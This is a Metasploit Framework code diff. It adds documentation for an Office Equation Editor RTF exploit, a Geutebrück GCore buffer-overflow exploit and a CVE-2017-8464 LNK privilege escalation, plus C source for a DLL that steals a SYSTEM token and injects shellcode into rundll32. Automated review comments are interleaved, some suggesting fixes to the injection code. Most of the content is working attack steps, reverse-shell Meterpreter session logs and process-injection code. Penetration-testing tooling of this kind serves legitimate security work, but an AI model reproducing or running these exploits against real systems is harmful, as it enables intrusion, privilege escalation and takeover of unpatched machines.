@@ -0,0 +1,56 @@ + +Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. + +## Vulnerable Application + +- Microsoft Office 2016 +- Microsoft Office 2013 Service Pack 1 +- Microsoft Office 2010 Service Pack 2 +- Microsoft Office 2007 + +## Verification Steps + +1. Start msfconsole +2. Do: `use exploit/windows/fileformat/office_ms17_11882` +3. Do: `set PAYLOAD [PAYLOAD]` +4. Do: `run` + +## Options +### FILENAME +Filename to output & if injecting a file, the file to inject + +### FOLDER_PATH +Path to filename to inject + + +## Example + +``` +msf > use exploit/windows/fileformat/office_ms17_11882 +msf exploit(office_ms17_11882) > set FILENAME msf.rtf +FILENAME => /home/mumbai/file.rtf +msf exploit(office_ms17_11882) > set LHOST ens3 +LHOST => ens3 +msf exploit(office_ms17_11882) > set LPORT 35116 +LPORT => 35116 +msf exploit(office_ms17_11882) > run +[*] Using URL: http://0.0.0.0:8080/BUY0DYgc +[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc +[*] Server started. +[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 +[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending +[*] Sending stage (205379 bytes) to 192.168.0.24 +[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500 +sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : TEST-PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x64/windows +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md new file mode 100644 index 0000000000..91d3629bc9 --- /dev/null 
+++ b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md 
@@ -0,0 +1,69 @@ +## Vulnerable Application + + Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation. + Since this application is started with system privileges this allows a system remote code execution. + +## Verification Steps + + 1. Install Windows as basic OS (Tested with Win2012R2, Windows 7) + 2. Install the Geutebrück GCore server + 3. Verify that http://:13003/statistics/runningmoduleslist.xml available is. + 4. Start msfconsole + 5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]``` + 6. Do: ```set rhost ``` + 7. Do: ```set rport 13003``` + 8. Do: ```set payload windows/x64/meterpreter/reverse_tcp``` + 9. Do: ```exploit``` + 10. You should get a shell as NT/SYSTEM. + +## Scenarios + +### Geutebrueck GCore 1.4.2.37 + +``` +msf exploit(geutebrueck_gcore_x64_rce_bo) > show options + +Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.1.10 yes The target address + RPORT 13003 yes The target port + + + + Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.1.11 yes The listen address + LPORT 4444 yes The listen port + + + Exploit target: + + Id Name + -- ---- + 0 Automatic Targeting + +msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit + [*] Started reverse TCP handler on 192.168.1.11:4444 + [*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml... + [*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...) + [*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37! + [*] 192.168.1.10:13003 - Crafting Exploit... + [*] 192.168.1.10:13003 - Exploit ready for sending... 
+ [*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to + [*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200 + [*] 192.168.1.10:13003 - Closing socket. + meterpreter > getsystem + ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). + meterpreter > getuid Server username: + NT-AUTORITÄT\SYSTEM + meterpreter > +``` + +## Mitigation + +Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities. diff --git a/documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md b/documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md new file mode 100644 index 0000000000..2d04740313 --- /dev/null +++ b/documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md 
@@ -0,0 +1,166 @@ +## Description +This module is a Windows local exploit version of the existing file +format module for CVE-2017-8464. The module works by dropping the +specially crafted LNK file and DLL to disk, which causes +`SearchProtocolHost.exe` to parse the LNK file and thus load the DLL via +the vulnerability. Due to `SearchProtocolHost.exe` running as SYSTEM, +this can be used to elevate privileges. + +The original DLL template needed some significant reworking to make it +compatible for execution within `SearchProtocolHost.exe`. The payload +was originally failing in the hollowed child `rundll32.exe` process with +a denied error from winsock. This was addressed by checking if the process +which loaded the crafted DLL is `SearchProtocolHost.exe` and when it is, +it opens the token of another SYSTEM process and passes it to +`CreateProcessAsUser` for the payload to work. When the DLL is loaded +into another process or is not running as SYSTEM, this step is skipped +and `NULL` is passed as the token. + +Finally a thread is spawned to keep a module reference and monitor the +child process. This is for synchronization to prevent the payload from +being executed in rapid succession from a single exploitation attempt. +The mutex was also updated to the constant of `MUTEX!!!` to leverage +Metasploit's builtin mutex name randomization, which ensures that a name +is unique per module run but not globally unique. 
+ +## Vulnerable Systems +Tested and works on +Windows 7x64 SP0 +Windows 7x64 SP1 +Windows 8x64 +Windows 8.1x64 +Windows 10x64 Build 1511 +Windows 10x64 Build 1607 +Windows 10x64 Build 1703 + +## Running Example: +``` +> use exploit/multi/handler +> set payload windows/x64/meterpreter/reverse_tcp +payload => windows/x64/meterpreter/reverse_tcp +> set LHOST 192.168.135.112 +LHOST => 192.168.135.112 +> set LPORT 30001 +LPORT => 30001 +> show options + +Module options (exploit/multi/handler): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + + +Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.135.112 yes The listen address + LPORT 30001 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Wildcard Target + + +[*] > Ruby Code (13 bytes) +> run -z +[*] Exploit running as background job 0. +[*] Started reverse TCP handler on 192.168.135.112:30001 +[*] Sending stage (205379 bytes) to 192.168.134.133 +[*] Meterpreter session 1 opened (192.168.135.112:30001 -> 192.168.134.133:49178) at 2017-11-06 10:22:02 -0800 +> sysinfo +Computer : WIN7X64-SP0 +OS : Windows 7 (Build 7600). 
+Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 4 +Meterpreter : x64/windows +> sessions -l + +Active sessions +=============== + + Id Type Information Connection + -- ---- ----------- ---------- + 1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133) + +> use exploit/windows/local/cve_2017_8464_lnk_lpe +> set session 1 +session => 1 +> set target 0 +target => 0 +> set payload windows/x64/meterpreter/reverse_tcp +payload => windows/x64/meterpreter/reverse_tcp +> set lhost 192.168.135.112 +lhost => 192.168.135.112 +> set lport 30002 +lport => 30002 +> set verbose true +verbose => true +> show options + +Module options (exploit/windows/local/cve_2017_8464_lnk_lpe): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DLLNAME no The DLL file containing the payload + FILENAME no The LNK file + PATH no An explicit path to where the files should be written to + SESSION 1 yes The session to run this module on. + + +Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.135.112 yes The listen address + LPORT 30002 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows x64 + + +> run -j +[*] Exploit running as background job 1. +[*] Started reverse TCP handler on 192.168.135.112:30002 +[*] Generating LNK file to load: C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll +[*] Sending stage (205379 bytes) to 192.168.134.133 +[*] Meterpreter session 2 opened (192.168.135.112:30002 -> 192.168.134.133:49179) at 2017-11-06 10:23:03 -0800 +[*] Waiting 15s before file cleanup... 
+[+] Deleted C:\Users\msfuser\HADoIQMbEQDpbbRn.lnk +[+] Deleted C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll +> sessions -l + +Active sessions +=============== + + Id Type Information Connection + -- ---- ----------- ---------- + 1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133) + 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X64-SP0 192.168.135.112:30002 -> 192.168.134.133:49179 (192.168.134.133) + +> getuid +Server username: WIN7X64-SP0\msfuser +Server username: NT AUTHORITY\SYSTEM +> getsystem +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +> getuid +Server username: NT AUTHORITY\SYSTEM +> exit -y +``` + +## Compiling instructions +`cd ./external/source/exploits/cve-2017-8464` +`./build.sh` + +(Requires `mingw-w64` package) diff --git a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md index d422147189..467f8c3603 100644 --- a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md +++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md @@ -4,7 +4,7 @@ via its SMTP server validation. The module sends a malicious response along in the 220 service ready response and exploits the client, resulting in an unprivileged shell. - he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe). + The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe). ## Verification Steps diff --git a/external/source/exploits/cve-2017-8464/build.sh b/external/source/exploits/cve-2017-8464/build.sh new file mode 100755 index 0000000000..c5eb5e5211 --- /dev/null +++ b/external/source/exploits/cve-2017-8464/build.sh 
@@ -0,0 +1,17 @@
+#!/bin/sh
+rm -f *.o *.dll
+
+CCx86="i686-w64-mingw32"
+CCx64="x86_64-w64-mingw32"
+
+${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
+${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
+${CCx64}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll
+rm -f temp.dll *.o
+chmod -x ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll
+
+${CCx86}-gcc -c -Os template.c -Wall -shared
+${CCx86}-dllwrap --def template.def *.o -o temp.dll
+${CCx86}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll
+rm -f temp.dll *.o
+chmod -x ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll
diff --git a/external/source/exploits/cve-2017-8464/template.c b/external/source/exploits/cve-2017-8464/template.c
new file mode 100644
index 0000000000..d995037b69
--- /dev/null
+++ b/external/source/exploits/cve-2017-8464/template.c
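Review bot: build.sh has no `set -e`, so if the x64 `gcc` step fails the script still runs `dllwrap` and `strip` against a missing object, then proceeds to the x86 build and exits 0, leaving `data/exploits/cve-2017-8464/template_x64_windows.dll` stale or absent without any signal to the person rebuilding the template. Every output path is also relative (`../../../../data/...`), so the script only works when invoked from its own directory, which the module documentation in this change set relies on by instructing a `cd` first. Adding `set -e` and `cd "$(dirname "$0")"` directly after the shebang makes a failed compile fatal and the script location-independent; the existing `rm -f *.o *.dll` already prevents stale objects from masking a failure once errors are fatal.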
@@ -0,0 +1,241 @@ +#include +#include +#include +#include +#include + +#include "template.h" + +void ExecutePayload(HANDLE hDll); + +BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { + switch (dwReason) { + case DLL_PROCESS_ATTACH: + ExecutePayload(hDll); + break; + + case DLL_PROCESS_DETACH: + break; + + case DLL_THREAD_ATTACH: + break; + + case DLL_THREAD_DETACH: + break; + } + return TRUE; +} + +BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) { + int result; + + if (strlen(szStr) < strlen(szSuffix)) { + return FALSE; + } + if (bCaseSensitive) { + result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + else { + result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + return result == 0; +} + +BOOL GetProcessSid(HANDLE hProc, PSID *pSid) { + HANDLE hToken; + DWORD dwLength = 0; + TOKEN_USER *tuUser = NULL; + SIZE_T szSid = 0; + + *pSid = NULL; + if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) { + return FALSE; + } + + GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength); + tuUser = (TOKEN_USER *)malloc(dwLength); + if (!tuUser) { + return FALSE; + } + + if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) { + free(tuUser); + return FALSE; + } + + szSid = GetLengthSid(tuUser->User.Sid); + *pSid = LocalAlloc(LPTR, szSid); + if ((*pSid) && (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid))) { + LocalFree(*pSid); + *pSid = NULL; + } + + free(tuUser); + CloseHandle(hToken); + return *pSid != NULL; +} + +BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) { + PSID pTestSid = NULL; + PSID pTargetSid = NULL; + + if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) { + return FALSE; + } + + if (!GetProcessSid(hProc, &pTestSid)) { + LocalFree(pTargetSid); + return FALSE; + } + + *pbResult = EqualSid(pTestSid, pTargetSid); + LocalFree(pTargetSid); + LocalFree(pTestSid); + return TRUE; +} + +DWORD FindProcessId(LPCTSTR 
szProcessName) { + HANDLE hProcessSnap; + PROCESSENTRY32 pe32; + DWORD result = 0; + + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hProcessSnap == INVALID_HANDLE_VALUE) { + return 0; + } + + pe32.dwSize = sizeof(PROCESSENTRY32); + if (!Process32First(hProcessSnap, &pe32)) { + CloseHandle(hProcessSnap); + return 0; + } + + do { + if (!strcmp(szProcessName, pe32.szExeFile)) { + result = pe32.th32ProcessID; + break; + } + } while (Process32Next(hProcessSnap, &pe32)); + CloseHandle(hProcessSnap); + return result; +} + +HANDLE GetPayloadToken(void) { + HANDLE hTokenHandle = NULL; + HANDLE hProcessHandle = NULL; + BOOL bIsSystem = FALSE; + DWORD dwPid = 0; + CHAR Path[MAX_PATH + 1]; + + ZeroMemory(Path, sizeof(Path)); + GetModuleFileNameA(NULL, Path, MAX_PATH); + if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) { + return NULL; + } + /* loaded into the context of SearchProtocolHost.exe */ + + if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* and running as NT_AUTHORITY SYSTEM */ + + dwPid = FindProcessId("spoolsv.exe"); + if (!dwPid) { + return NULL; + } + + hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); + if (!hProcessHandle) { + return NULL; + } + + bIsSystem = FALSE; + if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */ + + OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle); + CloseHandle(hProcessHandle); + return hTokenHandle; +} + +DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) { + /* wait for the process to exit or 10 seconds before cleaning up */ + WaitForSingleObject(pExploitData->hProcess, 10000); + CloseHandle(pExploitData->hProcess); + CloseHandle(pExploitData->hMutex); + + /* this does not return */ + FreeLibraryAndExitThread(pExploitData->hModule, 0); + return 0; +} + 
+void ExecutePayload(HANDLE hDll) { + PROCESS_INFORMATION pi; + STARTUPINFO si; + CONTEXT ctx; + LPVOID ep; + SECURITY_ATTRIBUTES MutexAttributes; + SIZE_T dwBytesWritten = 0; + PEXPLOIT_DATA pExploitData = NULL; + HANDLE hToken; + + pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA)); + if (!pExploitData) { + return; + } + + /* keep a reference to the module for synchronization purposes */ + GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule)); + + ZeroMemory(&MutexAttributes, sizeof(MutexAttributes)); + MutexAttributes.nLength = sizeof(MutexAttributes); + MutexAttributes.bInheritHandle = TRUE; // inherit the handle + pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!"); + if (!pExploitData->hMutex) { + return; + } + + if (GetLastError() == ERROR_ALREADY_EXISTS) { + CloseHandle(pExploitData->hMutex); + return; + } + + if (GetLastError() == ERROR_ACCESS_DENIED) { + CloseHandle(pExploitData->hMutex); + return; + } + + hToken = GetPayloadToken(); + + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + /* start up the payload in a new process */ + if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { + ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL; + GetThreadContext(pi.hThread, &ctx); + ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten); + if (dwBytesWritten == SCSIZE) { + +#ifdef _WIN64 + ctx.Rip = (DWORD64)ep; +#else + ctx.Eip = (DWORD)ep; +#endif + + SetThreadContext(pi.hThread, &ctx); + ResumeThread(pi.hThread); + + CloseHandle(pi.hThread); + pExploitData->hProcess = pi.hProcess; + } + } + + if (hToken) { + CloseHandle(hToken); + } + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL); +} 
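Review bot: In `ExecutePayload`, when `VirtualAllocEx` returns NULL or `WriteProcessMemory` writes fewer than `SCSIZE` bytes, the `rundll32.exe` child created with `CREATE_SUSPENDED` is neither resumed nor terminated and `pi.hThread`/`pi.hProcess` are never closed, so a failed injection leaves a suspended process (running as SYSTEM when the spoolsv token was obtained) behind on the target, and the monitor thread then waits on a NULL `hProcess`. The failure branch should terminate the child and close both handles before the monitor thread is created, as sketched below. Two smaller leaks in the same file: `GetProcessSid` returns without `CloseHandle(hToken)` when `malloc` or the second `GetTokenInformation` fails, and `GetPayloadToken` returns without `CloseHandle(hProcessHandle)` when spoolsv.exe is found not to be SYSTEM; note also that when `IsProcessRunningAsSystem` itself fails the code falls through as if the check had passed, which may be intended but deserves a comment. The early returns after `CreateMutex` keep both the module reference taken by `GetModuleHandleEx` and the `pExploitData` heap block; if that is deliberate for the already-exists case, say so in a comment.
```c
    /* start up the payload in a new process */
    if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
        ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);
        ep = VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (ep && WriteProcessMemory(pi.hProcess, ep, &code, SCSIZE, &dwBytesWritten) && dwBytesWritten == SCSIZE) {
            /* … unchanged: point Rip/Eip at ep, SetThreadContext, ResumeThread … */
            CloseHandle(pi.hThread);
            pExploitData->hProcess = pi.hProcess;
        } else {
            /* injection failed: do not leave a suspended rundll32.exe behind */
            TerminateProcess(pi.hProcess, 0);
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
    }
```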
diff --git a/data/exploits/cve-2017-8464/src/template.def b/external/source/exploits/cve-2017-8464/template.def
similarity index 100%
rename from data/exploits/cve-2017-8464/src/template.def
rename to external/source/exploits/cve-2017-8464/template.def
diff --git a/external/source/exploits/cve-2017-8464/template.h b/external/source/exploits/cve-2017-8464/template.h
new file mode 100644
index 0000000000..7181e46cba
--- /dev/null
+++ b/external/source/exploits/cve-2017-8464/template.h
@@ -0,0 +1,11 @@
+#define SCSIZE 2048
+unsigned char code[SCSIZE] = "PAYLOAD:";
+
+typedef struct {
+ HANDLE hModule;
+ HANDLE hMutex;
+ HANDLE hProcess;
+} EXPLOIT_DATA, *PEXPLOIT_DATA;
+
+#define SIDSTR_SYSTEM _T("s-1-5-18")
+#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult)
diff --git a/data/exploits/cve-2017-8464/src/template.rc b/external/source/exploits/cve-2017-8464/template.rc
similarity index 100%
rename from data/exploits/cve-2017-8464/src/template.rc
rename to external/source/exploits/cve-2017-8464/template.rc
diff --git a/lib/metasploit/framework/mssql/client.rb b/lib/metasploit/framework/mssql/client.rb
index 4c79a8eb0e..294fbbae2b 100644
--- a/lib/metasploit/framework/mssql/client.rb
+++ b/lib/metasploit/framework/mssql/client.rb
@@ -634,8 +634,8 @@ module Metasploit
 if idx > 0
 encryption_mode = resp[idx, 1].unpack("C")[0]
 else
- raise RunTimeError, "Unable to parse encryption req. "\
- "from server during prelogin"
+ framework_module.print_error("Unable to parse encryption req " \
+ "during pre-login, this may not be a MSSQL server")
 encryption_mode = ENCRYPT_NOT_SUP
 end
@@ -682,8 +682,9 @@ module Metasploit
 if idx > 0
 encryption_mode = resp[idx, 1].unpack("C")[0]
 else
- raise RuntimeError, "Unable to parse encryption "\
- "req during pre-login"
+ framework_module.print_error("Unable to parse encryption req " \
+ "during pre-login, this may not be a MSSQL server")
+ encryption_mode = ENCRYPT_NOT_SUP
 end
 end
 encryption_mode
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index c111856d17..22c37e115b 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -30,7 +30,7 @@ module Metasploit
 end
 end
- VERSION = "4.16.13"
+ VERSION = "4.16.23"
 MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
 PRERELEASE = 'dev'
 HASH = get_hash
diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb
index 1c170f8ce6..27fc80f110 100644
--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -634,7 +634,6 @@ class ReadableText
 sess_via = session.via_exploit.to_s
 sess_type = session.type.to_s
 sess_uuid = session.payload_uuid.to_s
- sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
 sess_luri = session.exploit_datastore['LURI'] || "" if session.exploit_datastore
 sess_enc = false
 if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key]
@@ -652,10 +651,10 @@ class ReadableText
 sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s ago @ #{session.last_checkin.to_s}"
 end
- if session.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid])
+ if session.payload_uuid.registered
 sess_registration = "Yes"
- if uuid_info['name']
- sess_registration << " - Name=\"#{uuid_info['name']}\""
+ if session.payload_uuid.name
+ sess_registration << " - Name=\"#{session.payload_uuid.name}\""
 end
 end
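Review bot: The replaced `raise` now calls `framework_module.print_error`, but nothing in the hunk shows that `framework_module` is always set; if this client is also instantiated without a module (for example by a login scanner), a malformed pre-login response now produces a `NoMethodError` on nil instead of the intended message, and the same applies to the sibling hunk at line 634. A nil-safe call keeps the degraded path working for every caller: `framework_module&.print_error("Unable to parse encryption req " \` followed by the existing continuation line. It is also worth a one-line comment above `encryption_mode = ENCRYPT_NOT_SUP` that an unparseable reply now falls back to an unencrypted login attempt rather than aborting, since that is a behavioural change from the old raise. The enclosing method begins before this hunk.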
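Review bot: `session.payload_uuid.registered` on the new side is evaluated unguarded, whereas the removed condition only reached into the uuid after `respond_to?(:puid_hex)`; the `.to_s` on `sess_uuid` a few lines above suggests `payload_uuid` can be nil or a plain value, in which case listing sessions would now raise `NoMethodError` for such a session. Guard it the same way the old code did: `if session.payload_uuid.respond_to?(:registered) && session.payload_uuid.registered`. The surrounding method starts and ends outside the hunk.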
diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 110e1fef3d..3e13987fb1 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -147,9 +147,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') session.core.set_session_guid(guid) session.session_guid = guid - # TODO: New statgeless session, do some account in the DB so we can track it later. + # TODO: New stageless session, do some account in the DB so we can track it later. else - # TODO: This session was either staged or previously known, and so we shold do some accounting here! + # TODO: This session was either staged or previously known, and so we should do some accounting here! end unless datastore['AutoLoadStdapi'] == false diff --git a/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb new file mode 100644 index 0000000000..85f1b69b3b --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_ppce500v2_Linux < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'linux' + self.base_arch = ARCH_PPCE500V2 + end +end + +end +end + diff --git a/lib/msf/base/sessions/mettle_config.rb b/lib/msf/base/sessions/mettle_config.rb index f135818614..369562a9c1 100644 --- a/lib/msf/base/sessions/mettle_config.rb +++ b/lib/msf/base/sessions/mettle_config.rb 
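Review bot: The three definitions in `Meterpreter_ppce500v2_Linux` run together with no blank line between `supports_ssl?`, `supports_zlib?` and `initialize`; one empty line between each method is the expected layout and matches the rest of the sessions directory. A short comment on why both capabilities are reported as unsupported would also help, since the class otherwise gives no hint, e.g. `# this mettle build has no SSL or zlib support — confirm against the ppce500v2 payload` placed above `supports_ssl?`. `ARCH_PPCE500V2` is referenced but not defined anywhere in this hunk, so the file only loads if that constant exists in the framework's architecture list.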
@@ -27,6 +27,10 @@ module Msf
 generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid])
 end
+ def generate_uri_option(opts, opt)
+ opts[opt] ? "--#{opt} '#{opts[opt].gsub(/'/, "\\'")}' " : ''
+ end
+
 def generate_http_uri(opts)
 if Rex::Socket.is_ipv6?(opts[:lhost])
 target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
@@ -38,7 +42,15 @@ module Msf
 target_uri << opts[:lport].to_s
 target_uri << luri
 target_uri << generate_uri(opts)
- target_uri
+ target_uri << '|'
+ target_uri << generate_uri_option(opts, :ua)
+ target_uri << generate_uri_option(opts, :host)
+ target_uri << generate_uri_option(opts, :referer)
+ if opts[:cookie]
+ opts[:header] = "Cookie: #{opts[:cookie]}"
+ target_uri << generate_uri_option(opts, :header)
+ end
+ target_uri.strip
 end
 def generate_tcp_uri(opts)
@@ -57,14 +69,11 @@ module Msf
 case opts[:scheme]
 when 'http'
- transport = transport_config_reverse_http(opts)
- opts[:uri] = generate_http_uri(transport)
+ opts[:uri] = generate_http_uri(transport_config_reverse_http(opts))
 when 'https'
- transport = transport_config_reverse_https(opts)
- opts[:uri] = generate_http_uri(transport)
+ opts[:uri] = generate_http_uri(transport_config_reverse_https(opts))
 when 'tcp'
- transport = transport_config_reverse_tcp(opts)
- opts[:uri] = generate_tcp_uri(transport)
+ opts[:uri] = generate_tcp_uri(transport_config_reverse_tcp(opts))
 else
 raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
 end
@@ -74,7 +83,7 @@ module Msf
 unless opts[:stageless] == true
 guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*')
 end
- opts[:session_guid] = Base64.encode64(guid)
+ opts[:session_guid] = Base64.encode64(guid).strip
 opts.slice(:uuid, :session_guid, :uri, :debug, :log_file)
 end
diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb
index d136f9a396..87a44c031f 100644
--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
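Review bot: In `generate_uri_option` the replacement `"\\'"` is the two-character string `\'`, which Ruby's `gsub` interprets as the post-match backreference rather than a literal backslash-quote; `"a'b".gsub(/'/, "\\'")` returns `"abb"`, so a user agent, host or cookie value containing a single quote is silently corrupted instead of escaped, and the quoting on the mettle command line breaks with it. The block form makes the replacement literal: `opts[opt] ? "--#{opt} '#{opts[opt].gsub("'") { "\\'" }}' " : ''`. An empty string is also truthy in Ruby, so an option explicitly set to `''` still emits `--ua ''`; `opts[opt].to_s.empty?` would be the check if that is not intended. How the consumer splits the `|`-separated quoted options is not visible here, so the quoting convention should be confirmed against mettle's argument parser.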
